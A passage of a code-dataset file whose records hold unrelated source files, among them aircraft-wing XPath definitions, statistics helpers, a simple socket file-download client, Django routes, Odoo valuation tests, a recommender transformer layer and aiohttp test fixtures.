'sparSegment[@uID=\"fs_%d\"]/sparCrossSection/web1/material/thickness'])\nx_fs_lowerCap_t = '/'.join([x_sparsegs, 'sparSegment[@uID=\"fs_%d\"]/sparCrossSection/lowerCap/material/thickness'])\nx_fs_upperCap_t = '/'.join([x_sparsegs, 'sparSegment[@uID=\"fs_%d\"]/sparCrossSection/upperCap/material/thickness'])\nx_rs_web_t = '/'.join([x_sparsegs, 'sparSegment[@uID=\"rs_%d\"]/sparCrossSection/web1/material/thickness'])\nx_rs_lowerCap_t = '/'.join([x_sparsegs, 'sparSegment[@uID=\"rs_%d\"]/sparCrossSection/lowerCap/material/thickness'])\nx_rs_upperCap_t = '/'.join([x_sparsegs, 'sparSegment[@uID=\"rs_%d\"]/sparCrossSection/upperCap/material/thickness'])\nx_mSkins = '/'.join([x_model, 'analyses/massBreakdown/mOEM/mEM/mStructure/mWingsStructure/'\n 'mWingStructure/mComponentSegment[%d]/mWingBox'])\n\n\"\"\" Wing optimization problem \"\"\"\nx_opt = '/cpacs/toolspecific/wingOptimizationProblem'\nx_planform = '/'.join([x_opt, 'planform'])\nx_structure = '/'.join([x_opt, 'structure'])\nx_reference = '/'.join([x_opt, 'reference'])\n\nx_const = '/'.join([x_opt, 'constants'])\nx_con = '/'.join([x_opt, 'constraints'])\nx_obj = '/'.join([x_opt, 'objectives'])\n\nx_c = '/'.join([x_planform, 'c'])\nx_tc = '/'.join([x_planform, 'tc'])\nx_epsilon = '/'.join([x_planform, 'epsilon'])\nx_b = '/'.join([x_planform, 'b'])\nx_Lambda = '/'.join([x_planform, 'Lambda'])\nx_Gamma = '/'.join([x_planform, 'Gamma'])\nx_incidence = '/'.join([x_planform, 'incidence'])\n\nx_xsi_fs = '/'.join([x_structure, 'xsi_fs'])\nx_xsi_rs = '/'.join([x_structure, 'xsi_rs'])\nx_t_fs = 
'/'.join([x_structure, 't_fs'])\nx_t_rs = '/'.join([x_structure, 't_rs'])\nx_t_ts = '/'.join([x_structure, 't_ts'])\nx_t_bs = '/'.join([x_structure, 't_bs'])\nx_t_skin = '/'.join([x_structure, 't_skin'])\n\nx_m_fixed = '/'.join([x_reference, 'm_fixed'])\nx_m_payload = '/'.join([x_reference, 'm_payload'])\nx_f_m_sys = '/'.join([x_reference, 'f_m_sys'])\nx_f_m_wings = '/'.join([x_reference, 'f_m_wings'])\nx_m_mlw = '/'.join([x_reference, 'm_MLW'])\nx_m_mtow = '/'.join([x_reference, 'm_MTOW'])\n\nx_SFC = '/'.join([x_reference, 'SFC'])\nx_m_fuel_res = '/'.join([x_reference, 'm_fuel_res'])\nx_CDfus = '/'.join([x_reference, 'C_D_fus'])\nx_CDother = '/'.join([x_reference, 'C_D_other'])\nx_R = '/'.join([x_reference, 'R'])\n\nx_rho_skin = '/'.join([x_reference, 'rho_skin'])\nx_sigma_yield = '/'.join([x_reference, 'sigma_yield'])\nx_WS_init = '/'.join([x_reference, 'WS_init'])\nx_CL_buffet = '/'.join([x_reference, 'C_L_buffet'])\nx_m_wing_init = '/'.join([x_reference, 'm_wing_init'])\nx_m_fuel_init = '/'.join([x_reference, 'm_fuel_init'])\n\nx_con_sigmas = ['/'.join([x_con, 'con_' + sigma]) for sigma in sigma_names]\nx_con_WS = '/'.join([x_con, 'con_WS'])\nx_con_buffet = '/'.join([x_con, 'con_buffet'])\n\nx_obj_m_fuel = '/'.join([x_obj, 'obj_m_fuel'])\nx_obj_m_wing = '/'.join([x_obj, 'obj_m_wing'])\n\n\n\"\"\" dAEDalus \"\"\"\nx_dAE = '/cpacs/toolspecific/dAEDalus'\nx_m_wing = '/'.join([x_dAE, 'm_wing'])\n\nx_loadcases = '/'.join([x_dAE, 'loadCases'])\nx_loadcase = '/'.join([x_loadcases, 'loadCase[%d]'])\n\nx_M = '/'.join([x_loadcase, 'M'])\nx_H = '/'.join([x_loadcase, 'H'])\nx_n = '/'.join([x_loadcase, 'n'])\nx_CL = '/'.join([x_loadcase, 'C_L'])\nx_CDf = '/'.join([x_loadcase, 'C_D_f'])\nx_CDi = '/'.join([x_loadcase, 'C_D_i'])\n\nx_grid_initial = ['/'.join([x_loadcase, 'initial_grid/' + component]) for component in ['x', 'y', 'z']]\nx_grid = ['/'.join([x_loadcase, 'deflected_grid/' + component]) for component in ['x', 'y', 'z']]\nx_grid_guess = ['/'.join([x_loadcase, 'guess_grid/' + component]) for component in ['x', 'y', 'z']]\n\nx_sigmas_in = ['/'.join([x_loadcase, sigma]) for sigma in sigma_names]\nx_load_collector = '/'.join([x_dAE, 'load_collector'])\nx_sigmas_out = ['/'.join([x_load_collector, sigma]) for sigma in sigma_names]\n\nx_y_norm = '/'.join([x_loadcase, 'y_norm'])\nx_l_norm = '/'.join([x_loadcase, 'l_norm'])\n\nx_geom = '/'.join([x_loadcase, 'geometric_model'])\nx_stru = '/'.join([x_loadcase, 'structural_model'])\nx_aero = '/'.join([x_loadcase, 'aerodynamic_model'])\n\nx_mle = '/'.join([x_loadcase, 'matlab_engine'])\nx_ml_timeout = '/'.join([x_mle, 'timeout'])\nx_ml_id = '/'.join([x_mle, 'id'])\nx_ml_timestamp = '/'.join([x_mle, 'timestamp'])\n\n\"\"\" FWE \"\"\"\nx_fwe = '/cpacs/toolspecific/fuel_weight_estimator'\n\nx_CD = '/'.join([x_fwe, 'C_D'])\nx_LD = '/'.join([x_fwe, 'L_D'])\nx_m_fuel = '/'.join([x_fwe, 'm_fuel'])\nx_fwe_CL = '/'.join([x_fwe, 'C_L'])\n","sub_path":"openlego/test_suite/test_examples/wing_opt/kb/disciplines/xpaths.py","file_name":"xpaths.py","file_ext":"py","file_size_in_byte":6347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"584698086","text":"\nimport math\nimport statistics\n\n\ndef stdev(values):\n    \"\"\"\n    Returns the population (or \"unbiased\") standard deviation\n    for the given values.\n    \"\"\"\n    # This replaced numpy.std(), which calculates the population\n    # standard deviation, and not the sample standard deviation.\n    # statistics.stdev calculates the sample standard deviation, but in\n    # order 
to get the same value as previously calculated, we have to\n    # use the square root of statistics.pvariance.\n    if (len(values) == 0):\n        # mirror numpy.std functionality of returning nan when input is empty\n        return float('nan')\n    # else standard dev is the square root of the variance\n    return math.sqrt(statistics.pvariance(values))\n\n\ndef get_histogram(values, num_bins=10):\n    \"\"\"\n    Get a histogram of a list of numeric values.\n    Returns array of \"bin\" dicts with keys `count`, `max`, and `min`.\n    \"\"\"\n\n    if (num_bins <= 0):\n        raise ValueError('num_bins must be greater than 0')\n\n    # convert values to floats\n    values = [float(v) for v in values]\n\n    # When input array is empty, can't determine range so use 0.0 - 1.0\n    # as numpy.histogram does\n    if (len(values) == 0):\n        mn, mx = 0.0, 1.0\n    else:\n        # find the min and max\n        mn, mx = min(values), max(values)\n\n    # Adjust mn and mx if they are equivalent (ie, the input array\n    # values are all the same number)\n    if (mn == mx):\n        mn -= 0.5\n        mx += 0.5\n\n    bin_width = (mx - mn) / num_bins\n\n    # initialize the bins\n    bins = [{\n        'min': mn + bin_width * i,\n        'max': mn + bin_width * (i + 1),\n        'count': 0\n    } for i in range(0, num_bins)]\n\n    # bin the values\n    for val in values:\n        for b in bins:\n            if (val >= b['min'] and val < b['max']):\n                b['count'] += 1\n            # correction for when a value == the max value\n            if (val == mx and b['max'] == mx):\n                b['count'] += 1\n\n    return bins\n","sub_path":"api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"171571030","text":"import socket\n\ndef main():\n    # 创建套接字\n    s_download = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n    # 获取dest_ip dest_port\n    #dest_ip = input(\"请输入目标ip:\")\n    dest_ip = \"10.0.0.8\"\n    dest_port = int(input(\"请输入目标端口:\"))\n    dest_addr = (dest_ip,dest_port)\n    # 链接服务器\n    s_download.connect(dest_addr)\n    # 获取下载文件的名字\n    file_name = input(\"请输入要下载的文件名:\")\n    # 将文件名发送到服务器\n    s_download.send(file_name.encode(\"gbk\"))\n    # 接受文件中的数据\n    file_recv = s_download.recv(1024*1024)\n    # 保存接受到的数据到文件中\n    if file_recv:\n        with open(\"download_\"+file_name,\"w\") as f:\n            f.write(file_recv.decode(\"gbk\"))\n    # 关闭套接字\n    s_download.close()\n    \n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"socket/ubuntu_py/socket-tcp/04-文件下载器-client.py","file_name":"04-文件下载器-client.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"375400754","text":"import os\nimport argparse\nfrom typing import Sequence\nfrom urllib.parse import urlparse\n\n\nclass Configuration:\n    def __init__(\n        self,\n        repositoryUrl: str,\n        batchMonths: int,\n        outputPath: str,\n        sentiStrengthPath: str,\n        maxDistance: int,\n        pat: str,\n        googleKey: str,\n        startDate: str\n    ):\n        self.repositoryUrl = repositoryUrl\n        self.batchMonths = batchMonths\n        self.outputPath = outputPath\n        self.sentiStrengthPath = sentiStrengthPath\n        self.maxDistance = maxDistance\n        self.pat = pat\n        self.googleKey = googleKey\n        self.startDate = startDate\n\n        # parse repo name into owner and project name\n        split = self.repositoryUrl.split(\"/\")\n        self.repositoryOwner = split[3]\n        self.repositoryName = split[4]\n\n        # build repo path\n        self.repositoryPath = os.path.join(self.outputPath, split[3], split[4])\n\n        # build results path\n        self.resultsPath = os.path.join(self.repositoryPath, \"results\")\n\n        # build metrics path\n        self.metricsPath = 
os.path.join(self.resultsPath, \"metrics\")\n\n\ndef parseAliasArgs(args: Sequence[str]):\n\n    parser = argparse.ArgumentParser(\n        description=\"Extract commit author aliases from GitHub repositories.\",\n        epilog=\"Check README file for more information on running this tool.\",\n    )\n\n    parser.add_argument(\n        \"-p\",\n        \"--pat\",\n        help=\"GitHub PAT (personal access token) used for querying the GitHub API\",\n        required=True,\n    )\n\n    parser.add_argument(\n        \"-r\",\n        \"--repositoryUrl\",\n        help=\"GitHub repository URL that you want to analyse\",\n        required=True,\n    )\n\n    parser.add_argument(\n        \"-d\",\n        \"--maxDistance\",\n        help=\"\"\"string distance metric\n        https://github.com/luozhouyang/python-string-similarity#metric-longest-common-subsequence\n        \"\"\",\n        type=float,\n        required=True,\n    )\n\n    parser.add_argument(\n        \"-o\",\n        \"--outputPath\",\n        help=\"local directory path for analysis output\",\n        required=True,\n    )\n\n    parser.add_argument(\n        \"-sd\",\n        \"--startDate\",\n        help=\"start date of project life\",\n        required=False,\n    )\n\n    args = parser.parse_args()\n    config = Configuration(\n        args.repositoryUrl, 0, args.outputPath, \"\", args.maxDistance, args.pat, \"\"\n    )\n\n    return config\n\n\ndef parseDevNetworkArgs(args: Sequence[str]):\n\n    parser = argparse.ArgumentParser(\n        description=\"Perform network and statistical analysis on GitHub repositories.\",\n        epilog=\"Check README file for more information on running this tool.\",\n    )\n\n    parser.add_argument(\n        \"-p\",\n        \"--pat\",\n        help=\"GitHub PAT (personal access token) used for querying the GitHub API\",\n        required=True,\n    )\n\n    parser.add_argument(\n        \"-g\",\n        \"--googleKey\",\n        help=\"Google Cloud API Key used for authentication with the Perspective API\",\n        required=False,\n    )\n\n    parser.add_argument(\n        \"-r\",\n        \"--repositoryUrl\",\n        help=\"GitHub repository URL that you want to analyse\",\n        required=True,\n    )\n\n    parser.add_argument(\n        \"-m\",\n        \"--batchMonths\",\n        help=\"Number of months to analyze per batch. Default=9999\",\n        type=float,\n        default=9999,\n    )\n\n    parser.add_argument(\n        \"-s\",\n        \"--sentiStrengthPath\",\n        help=\"local directory path to the SentiStrength tool\",\n        required=True,\n    )\n\n    parser.add_argument(\n        \"-o\",\n        \"--outputPath\",\n        help=\"Local directory path for analysis output\",\n        required=True,\n    )\n\n    parser.add_argument(\n        \"-sd\",\n        \"--startDate\",\n        help=\"Start date of project life\",\n        required=False,\n    )\n\n    args = parser.parse_args(args)\n\n    #validation of the input inserted by the user\n    if args.repositoryUrl is None:\n        raise ValueError(\"The repository URL is needed\")\n\n    if \"github\" not in urlparse(args.repositoryUrl).netloc:\n        raise ValueError(\"The repository URL inserted is not valid or malformed\")\n\n    if args.pat is None:\n        raise ValueError(\"A valid GitHub PAT is needed to clone the repository\")\n\n    senti_files_found = False\n\n    if args.sentiStrengthPath is None:\n        raise ValueError(\"A valid senti folder is needed to perform sentiment analysis on the repository\")\n\n    try:\n        with os.scandir(args.sentiStrengthPath) as entries:\n            for entry in entries:\n                if \"SentiStrength\" in entry.name:\n                    senti_files_found = True\n                    break\n        if not senti_files_found:\n            raise ValueError(\"The senti folder provided does not contain the needed files. 
Check the README for more \"\n                             \"details\")\n    except FileNotFoundError:\n        raise ValueError(\"A malformed or invalid senti folder is provided\")\n\n    if args.outputPath is None:\n        raise ValueError(\"A valid output folder is needed to save the analysis of the repository\")\n\n    try:\n        with os.scandir(args.outputPath) as entries:\n            pass\n    except FileNotFoundError:\n        raise ValueError(\"The output folder provided is not available in the file system or has restricted access\")\n\n    config = Configuration(\n        args.repositoryUrl,\n        args.batchMonths,\n        args.outputPath,\n        args.sentiStrengthPath,\n        0,\n        args.pat,\n        args.googleKey,\n        args.startDate\n    )\n\n    return config\n","sub_path":"configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":5565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"98319577","text":"from django.urls import include, path\nfrom rest_framework.routers import SimpleRouter\n\nfrom .views import PollViewSet, QuestionViewSet, ChoiceViewSet, \\\n    UserPollViewSet, UserTestViewSet\n\nrouter = SimpleRouter()\n\nrouter.register('polls', PollViewSet, basename='poll')\nrouter.register(\n    r'polls/(?P\\d+)/questions',\n    QuestionViewSet,\n    basename='question'\n)\nrouter.register(\n    r'polls/(?P\\d+)/questions/(?P\\d+)/choices',\n    ChoiceViewSet,\n    basename='choice'\n)\n# Для пользователей #\nrouter.register('users/polls', UserPollViewSet, basename='users_poll')\nrouter.register('users/tests', UserTestViewSet, basename='users_test')\n\nurlpatterns = [\n    path('', include(router.urls)),\n]\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"17235468","text":"from machine import Timer\nfrom machine import Pin\ntim = Timer(1, mode=Timer.PERIODIC, width=32)\ntim_a = tim.channel(Timer.A | Timer.B, freq=1)  # 1 Hz frequency requires a 32 bit timer\n\nled = Pin(25, Pin.OUT) # enable GP16 as output to drive the LED\n\ndef tick(timer): # we will receive the timer object when being called\n    global led\n    print(\"toggle led\")\n    led.toggle() # toggle the LED\n\ntim_a.irq(handler=tick, trigger=Timer.TIMEOUT) # create the interrupt","sub_path":"timer_irq.py","file_name":"timer_irq.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"354373770","text":"# -*- encoding: utf-8 -*-\n# Copyright (c) Alibaba, Inc. 
and its affiliates.\nimport tensorflow as tf\nfrom tensorflow.python.keras.layers import Layer\n\nfrom easy_rec.python.layers import multihead_cross_attention\nfrom easy_rec.python.utils.activation import get_activation\nfrom easy_rec.python.utils.shape_utils import get_shape_list\n\n\nclass BST(Layer):\n\n def __init__(self, params, name='bst', l2_reg=None, **kwargs):\n super(BST, self).__init__(name=name, **kwargs)\n self.l2_reg = l2_reg\n self.config = params.get_pb_config()\n\n def encode(self, seq_input, max_position):\n seq_fea = multihead_cross_attention.embedding_postprocessor(\n seq_input,\n position_embedding_name=self.name + '/position_embeddings',\n max_position_embeddings=max_position,\n reuse_position_embedding=tf.AUTO_REUSE)\n\n n = tf.count_nonzero(seq_input, axis=-1)\n seq_mask = tf.cast(n > 0, tf.int32)\n\n attention_mask = multihead_cross_attention.create_attention_mask_from_input_mask(\n from_tensor=seq_fea, to_mask=seq_mask)\n\n hidden_act = get_activation(self.config.hidden_act)\n attention_fea = multihead_cross_attention.transformer_encoder(\n seq_fea,\n hidden_size=self.config.hidden_size,\n num_hidden_layers=self.config.num_hidden_layers,\n num_attention_heads=self.config.num_attention_heads,\n attention_mask=attention_mask,\n intermediate_size=self.config.intermediate_size,\n intermediate_act_fn=hidden_act,\n hidden_dropout_prob=self.config.hidden_dropout_prob,\n attention_probs_dropout_prob=self.config.attention_probs_dropout_prob,\n initializer_range=self.config.initializer_range,\n name=self.name + '/transformer',\n reuse=tf.AUTO_REUSE)\n # attention_fea shape: [batch_size, seq_length, hidden_size]\n out_fea = attention_fea[:, 0, :] # target feature\n print('bst output shape:', out_fea.shape)\n return out_fea\n\n def call(self, inputs, training=None, **kwargs):\n seq_features, target_features = inputs\n assert len(seq_features) > 0, '[%s] sequence feature is empty' % self.name\n if not training:\n self.config.hidden_dropout_prob = 0.0\n self.config.attention_probs_dropout_prob = 0.0\n\n seq_embeds = [seq_fea for seq_fea, _ in seq_features]\n\n max_position = self.config.max_position_embeddings\n # max_seq_len: the max sequence length in current mini-batch, all sequences are padded to this length\n batch_size, max_seq_len, _ = get_shape_list(seq_features[0][0], 3)\n valid_len = tf.assert_less_equal(\n max_seq_len,\n max_position,\n message='sequence length is greater than `max_position_embeddings`:' +\n str(max_position) + ' in feature group:' + self.name)\n with tf.control_dependencies([valid_len]):\n # seq_input: [batch_size, seq_len, embed_size]\n seq_input = tf.concat(seq_embeds, axis=-1)\n if len(target_features) > 0:\n max_position += 1\n\n seq_embed_size = seq_input.shape.as_list()[-1]\n if seq_embed_size != self.config.hidden_size:\n seq_input = tf.layers.dense(\n seq_input,\n self.config.hidden_size,\n activation=tf.nn.relu,\n kernel_regularizer=self.l2_reg)\n\n if len(target_features) > 0:\n target_feature = tf.concat(target_features, axis=-1)\n target_size = target_feature.shape.as_list()[-1]\n assert seq_embed_size == target_size, 'the embedding size of sequence and target item is not equal' \\\n ' in feature group:' + self.name\n if target_size != self.config.hidden_size:\n target_feature = tf.layers.dense(\n target_feature,\n self.config.hidden_size,\n activation=tf.nn.relu,\n kernel_regularizer=self.l2_reg)\n # target_feature: [batch_size, 1, embed_size]\n target_feature = tf.expand_dims(target_feature, 1)\n # seq_input: [batch_size, seq_len+1, 
embed_size]\n seq_input = tf.concat([target_feature, seq_input], axis=1)\n\n return self.encode(seq_input, max_position)\n","sub_path":"easy_rec/python/layers/keras/bst.py","file_name":"bst.py","file_ext":"py","file_size_in_byte":4065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"400236157","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\nfrom odoo.addons.stock_account.tests.test_anglo_saxon_valuation_reconciliation_common import ValuationReconciliationTestCommon\nfrom odoo.tests.common import Form, tagged\n\n\n@tagged('post_install', '-at_install')\nclass TestValuationReconciliation(ValuationReconciliationTestCommon):\n\n @classmethod\n def setUpClass(cls, chart_template_ref=None):\n super().setUpClass(chart_template_ref=chart_template_ref)\n\n cls.stock_account_product_categ.property_account_creditor_price_difference_categ = cls.company_data['default_account_stock_price_diff']\n\n @classmethod\n def setup_company_data(cls, company_name, chart_template=None, **kwargs):\n company_data = super().setup_company_data(company_name, chart_template=chart_template, **kwargs)\n\n # Create stock config.\n company_data.update({\n 'default_account_stock_price_diff': cls.env['account.account'].create({\n 'name': 'default_account_stock_price_diff',\n 'code': 'STOCKDIFF',\n 'reconcile': True,\n 'user_type_id': cls.env.ref('account.data_account_type_current_assets').id,\n 'company_id': company_data['company'].id,\n }),\n })\n return company_data\n\n def _create_purchase(self, product, date, quantity=1.0, set_tax=False, price_unit=66.0):\n rslt = self.env['purchase.order'].create({\n 'partner_id': self.partner_a.id,\n 'currency_id': self.currency_data['currency'].id,\n 'order_line': [\n (0, 0, {\n 'name': product.name,\n 'product_id': product.id,\n 'product_qty': quantity,\n 'product_uom': product.uom_po_id.id,\n 'price_unit': price_unit,\n 'date_planned': date,\n 'taxes_id': [(6, 0, product.supplier_taxes_id.ids)] if set_tax else False,\n })],\n 'date_order': date,\n })\n rslt.button_confirm()\n return rslt\n\n def _create_invoice_for_po(self, purchase_order, date):\n move_form = Form(self.env['account.move'].with_context(default_move_type='in_invoice', default_date=date))\n move_form.invoice_date = date\n move_form.partner_id = self.partner_a\n move_form.currency_id = self.currency_data['currency']\n move_form.purchase_id = purchase_order\n return move_form.save()\n\n def test_shipment_invoice(self):\n \"\"\" Tests the case into which we receive the goods first, and then make the invoice.\n \"\"\"\n test_product = self.test_product_delivery\n date_po_and_delivery = '2018-01-01'\n\n purchase_order = self._create_purchase(test_product, date_po_and_delivery)\n self._process_pickings(purchase_order.picking_ids, date=date_po_and_delivery)\n\n invoice = self._create_invoice_for_po(purchase_order, '2018-02-02')\n invoice.action_post()\n picking = self.env['stock.picking'].search([('purchase_id','=',purchase_order.id)])\n self.check_reconciliation(invoice, picking)\n # cancel the invoice\n invoice.button_cancel()\n\n def test_invoice_shipment(self):\n \"\"\" Tests the case into which we make the invoice first, and then receive the goods.\n \"\"\"\n # Create a PO and an invoice for it\n test_product = self.test_product_order\n purchase_order = self._create_purchase(test_product, '2017-12-01')\n\n invoice = self._create_invoice_for_po(purchase_order, '2017-12-23')\n move_form = Form(invoice)\n 
with move_form.invoice_line_ids.edit(0) as line_form:\n line_form.quantity = 1\n invoice = move_form.save()\n\n # Validate the invoice and refund the goods\n invoice.action_post()\n self._process_pickings(purchase_order.picking_ids, date='2017-12-24')\n picking = self.env['stock.picking'].search([('purchase_id', '=', purchase_order.id)])\n self.check_reconciliation(invoice, picking)\n\n # Return the goods and refund the invoice\n stock_return_picking_form = Form(self.env['stock.return.picking']\n .with_context(active_ids=picking.ids, active_id=picking.ids[0],\n active_model='stock.picking'))\n stock_return_picking = stock_return_picking_form.save()\n stock_return_picking.product_return_moves.quantity = 1.0\n stock_return_picking_action = stock_return_picking.create_returns()\n return_pick = self.env['stock.picking'].browse(stock_return_picking_action['res_id'])\n return_pick.action_assign()\n return_pick.move_lines.quantity_done = 1\n return_pick._action_done()\n self._change_pickings_date(return_pick, '2018-01-13')\n\n # Refund the invoice\n refund_invoice_wiz = self.env['account.move.reversal'].with_context(active_model=\"account.move\", active_ids=[invoice.id]).create({\n 'reason': 'test_invoice_shipment_refund',\n 'refund_method': 'cancel',\n 'date': '2018-03-15',\n })\n refund_invoice = self.env['account.move'].browse(refund_invoice_wiz.reverse_moves()['res_id'])\n\n # Check the result\n self.assertEqual(invoice.payment_state, 'reversed', \"Invoice should be in 'reversed' state\")\n self.assertEqual(refund_invoice.payment_state, 'paid', \"Refund should be in 'paid' state\")\n self.check_reconciliation(refund_invoice, return_pick)\n\n def test_multiple_shipments_invoices(self):\n \"\"\" Tests the case into which we receive part of the goods first, then 2 invoices at different rates, and finally the remaining quantities\n \"\"\"\n test_product = self.test_product_delivery\n date_po_and_delivery0 = '2017-01-01'\n purchase_order = self._create_purchase(test_product, date_po_and_delivery0, quantity=5.0)\n self._process_pickings(purchase_order.picking_ids, quantity=2.0, date=date_po_and_delivery0)\n picking = self.env['stock.picking'].search([('purchase_id', '=', purchase_order.id)], order=\"id asc\", limit=1)\n\n invoice = self._create_invoice_for_po(purchase_order, '2017-01-15')\n move_form = Form(invoice)\n with move_form.invoice_line_ids.edit(0) as line_form:\n line_form.quantity = 3.0\n invoice = move_form.save()\n invoice.action_post()\n self.check_reconciliation(invoice, picking, full_reconcile=False)\n\n invoice2 = self._create_invoice_for_po(purchase_order, '2017-02-15')\n move_form = Form(invoice2)\n with move_form.invoice_line_ids.edit(0) as line_form:\n line_form.quantity = 2.0\n invoice2 = move_form.save()\n invoice2.action_post()\n self.check_reconciliation(invoice2, picking, full_reconcile=False)\n\n # We don't need to make the date of processing explicit since the very last rate\n # will be taken\n self._process_pickings(purchase_order.picking_ids.filtered(lambda x: x.state != 'done'), quantity=3.0)\n picking = self.env['stock.picking'].search([('purchase_id', '=', purchase_order.id)], order='id desc', limit=1)\n self.check_reconciliation(invoice2, picking)\n\n def test_rounding_discount(self):\n self.env.ref(\"product.decimal_discount\").digits = 5\n tax_exclude_id = self.env[\"account.tax\"].create(\n {\n \"name\": \"Exclude tax\",\n \"amount\": \"0.00\",\n \"type_tax_use\": \"purchase\",\n }\n )\n\n test_product = self.test_product_delivery\n 
test_product.supplier_taxes_id = [(6, 0, tax_exclude_id.ids)]\n date_po_and_delivery = '2018-01-01'\n\n purchase_order = self._create_purchase(test_product, date_po_and_delivery, quantity=10000, set_tax=True)\n self._process_pickings(purchase_order.picking_ids, date=date_po_and_delivery)\n\n invoice = self._create_invoice_for_po(purchase_order, '2018-01-01')\n\n # Set a discount\n move_form = Form(invoice)\n with move_form.invoice_line_ids.edit(0) as line_form:\n line_form.discount = 0.92431\n move_form.save()\n\n invoice.action_post()\n\n # Check the price difference amount.\n price_diff_line = invoice.line_ids.filtered(lambda l: l.account_id == self.stock_account_product_categ.property_account_creditor_price_difference_categ)\n self.assertTrue(len(price_diff_line) == 1, \"A price difference line should be created\")\n self.assertAlmostEqual(price_diff_line.price_total, -6100.446)\n\n picking = self.env['stock.picking'].search([('purchase_id','=',purchase_order.id)])\n self.check_reconciliation(invoice, picking)\n\n def test_rounding_price_unit(self):\n self.env.ref(\"product.decimal_price\").digits = 6\n\n test_product = self.test_product_delivery\n date_po_and_delivery = '2018-01-01'\n\n purchase_order = self._create_purchase(test_product, date_po_and_delivery, quantity=1000000, price_unit=0.0005)\n self._process_pickings(purchase_order.picking_ids, date=date_po_and_delivery)\n\n invoice = self._create_invoice_for_po(purchase_order, '2018-01-01')\n\n # Set a discount\n move_form = Form(invoice)\n with move_form.invoice_line_ids.edit(0) as line_form:\n line_form.price_unit = 0.0006\n move_form.save()\n\n invoice.action_post()\n\n # Check the price difference amount. It's expected that price_unit * qty != price_total.\n price_diff_line = invoice.line_ids.filtered(lambda l: l.account_id == self.stock_account_product_categ.property_account_creditor_price_difference_categ)\n self.assertTrue(len(price_diff_line) == 1, \"A price difference line should be created\")\n self.assertAlmostEqual(price_diff_line.price_unit, 0.0001)\n self.assertAlmostEqual(price_diff_line.price_total, 100.0)\n\n picking = self.env['stock.picking'].search([('purchase_id','=',purchase_order.id)])\n self.check_reconciliation(invoice, picking)\n","sub_path":"addons/purchase_stock/tests/test_anglo_saxon_valuation_reconciliation.py","file_name":"test_anglo_saxon_valuation_reconciliation.py","file_ext":"py","file_size_in_byte":10086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"57419067","text":"import argparse\nimport serial\nimport serial.tools.list_ports\nfrom utils.message_parse import Parser, Message, MessageType\nfrom loguru import logger\nfrom utils import string_formatter as fmt\nimport struct\nimport os\nimport datetime\nimport jsonlines\n\n\ndef main():\n parser = argparse.ArgumentParser(\"Collects data from the Arduino via serial port connection\")\n parser.add_argument(\"-o\", \"--output\", default=\"output\")\n\n args = parser.parse_args()\n\n port = serial.Serial(port=\"/dev/cu.usbserial-DN01JH39\",\n baudrate=9600,\n timeout=0.2)\n parser = Parser()\n\n os.makedirs(args.output, exist_ok=True)\n output_file = os.path.join(args.output, \"arduino_feed_{}.jsonl\".format(datetime.datetime.now()))\n\n with jsonlines.open(output_file, \"w\", flush=True) as f:\n while True:\n byte_data = port.read()\n\n parser.add_bytes(byte_data)\n msg = parser.next_message()\n\n if msg is not None:\n measurement = struct.unpack(\"f\", fmt.bytes_from_list(msg.data))[0]\n 
msg_type = MessageType.to_string(msg.msg_type)\n                logger.info(\"Type: {}, Data: {}\".format(msg_type,\n                                                         measurement))\n                f.write({\n                    msg_type: measurement\n                })\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"gui_and_analytics/analytics/active_listener.py","file_name":"active_listener.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"530682609","text":"from typing import Dict, Mapping, Optional\nfrom uuid import UUID\n\nfrom aiohttp.test_utils import AioHTTPTestCase\nfrom aiohttp.web_app import Application\nfrom sqlalchemy import desc, select\n\nfrom aiohttp_rest_framework.db.sa import SAManager\nfrom aiohttp_rest_framework.settings import get_global_config\nfrom tests.functional.sa.orm.utils import create_data_fixtures\nfrom tests.functional.sa.utils import create_tables, drop_tables\nfrom tests.test_app.sa.orm.app import create_application\nfrom tests.test_app.sa.orm.config import DB_URL\nfrom tests.test_app.sa.orm.models import SAField, User, meta\nfrom tests.utils import async_session\n\n\nclass BaseTestCase(AioHTTPTestCase):\n    rest_config: Optional[Mapping] = None\n\n    async def get_application(self) -> Application:\n        return create_application(DB_URL, self.rest_config)\n\n    async def setUpAsync(self) -> None:\n        await drop_tables(meta, DB_URL)\n        await create_tables(meta, DB_URL)\n        await create_data_fixtures(DB_URL)\n        self.user = await self.get_test_user()\n        self.sa_instance = await self.get_sa_instance()\n\n    async def tearDownAsync(self) -> None:\n        await drop_tables(meta, DB_URL)\n\n    async def get_test_user(self) -> User:\n        async with async_session(DB_URL) as session:\n            query = select(User).limit(1)\n            result = await session.execute(query)\n            user = result.scalars().one()\n        return user\n\n    async def get_sa_instance(self) -> SAField:\n        async with async_session(DB_URL) as session:\n            query = select(SAField).limit(1)\n            result = await session.execute(query)\n            inst = result.scalars().one()\n        return inst\n\n    async def get_last_created_user(self) -> User:\n        async with async_session(DB_URL) as session:\n            query = select(User).order_by(desc(User.created_at))\n            result = await session.execute(query)\n            user = result.scalars().first()\n        return user\n\n    async def get_user_by_id(self, user_id: UUID) -> User:\n        async with async_session(DB_URL) as session:\n            query = select(User).where(User.id == user_id)\n            result = await session.execute(query)\n            user = 